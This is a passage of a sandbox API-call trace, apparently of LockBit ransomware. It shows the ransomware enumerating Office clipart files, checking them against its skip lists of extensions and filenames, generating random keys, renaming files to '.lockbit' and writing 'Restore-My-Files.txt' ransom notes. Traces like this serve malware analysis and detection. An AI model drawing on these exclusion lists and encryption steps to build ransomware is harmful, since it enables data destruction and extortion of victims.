NumberOfConcurrentThreads=0x0) returned 0x14c [0154.550] malloc (_Size=0x40068) returned 0x3d70450 [0154.550] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=32984) returned 1 [0154.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0154.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0154.551] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0154.556] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287020.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287020.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.556] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.556] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.558] free (_Block=0x1fa2ed8) [0154.558] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287020.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.558] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.558] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.558] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc6d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287024.WMF", cAlternateFileName="")) returned 1 [0154.558] lstrcmpiW (lpString1=".", lpString2="J0287024.WMF") returned -1 [0154.558] lstrcmpiW (lpString1="..", lpString2="J0287024.WMF") returned -1 [0154.558] PathFindExtensionW (pszPath="J0287024.WMF") returned=".WMF" [0154.558] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.558] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.559] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.559] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.560] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287024.WMF") returned 1 [0154.560] lstrcmpiW (lpString1="ntldr", lpString2="J0287024.WMF") returned 1 [0154.560] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287024.WMF") returned 1 [0154.560] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287024.WMF") returned -1 [0154.560] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287024.WMF") returned -1 [0154.561] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287024.WMF") returned 1 [0154.561] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287024.WMF") returned -1 [0154.561] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.561] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287024.WMF") returned=".WMF" [0154.561] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.561] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.561] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.562] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.562] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287024.WMF.lockbit") returned 72 [0154.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287024.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287024.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.563] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.563] malloc (_Size=0x40068) returned 0x3e70008 [0154.563] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=50898) returned 1 [0154.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.564] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0154.564] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0154.565] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0154.570] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287024.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287024.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.570] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.570] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.572] free (_Block=0x1fa2ed8) [0154.572] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287024.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.572] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.572] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xcd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287408.WMF", cAlternateFileName="")) returned 1 [0154.572] lstrcmpiW (lpString1=".", lpString2="J0287408.WMF") returned -1 [0154.572] lstrcmpiW (lpString1="..", lpString2="J0287408.WMF") returned -1 [0154.572] PathFindExtensionW (pszPath="J0287408.WMF") returned=".WMF" [0154.572] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.572] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.572] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.572] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.572] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.572] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.572] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.572] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.572] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.573] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.573] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.574] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287408.WMF") returned 1 [0154.574] lstrcmpiW (lpString1="ntldr", lpString2="J0287408.WMF") returned 1 [0154.574] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287408.WMF") returned 1 [0154.574] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287408.WMF") returned -1 [0154.575] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287408.WMF") returned -1 [0154.575] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287408.WMF") returned 1 [0154.575] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287408.WMF") returned -1 [0154.575] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.575] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287408.WMF") returned=".WMF" [0154.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.575] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.575] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.576] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.576] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287408.WMF.lockbit") returned 72 [0154.576] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287408.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287408.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0154.577] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.577] malloc (_Size=0x40068) returned 0x3ef0008 [0154.577] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=52496) returned 1 [0154.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0154.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0154.579] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0154.584] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287408.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287408.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.584] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.584] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.587] free (_Block=0x1fa2ed8) [0154.587] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287408.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.588] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.588] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.588] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa80c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287415.WMF", cAlternateFileName="")) returned 1 [0154.588] lstrcmpiW (lpString1=".", lpString2="J0287415.WMF") returned -1 [0154.588] lstrcmpiW (lpString1="..", lpString2="J0287415.WMF") returned -1 [0154.588] PathFindExtensionW (pszPath="J0287415.WMF") returned=".WMF" [0154.588] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.588] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.589] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.589] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".ico", 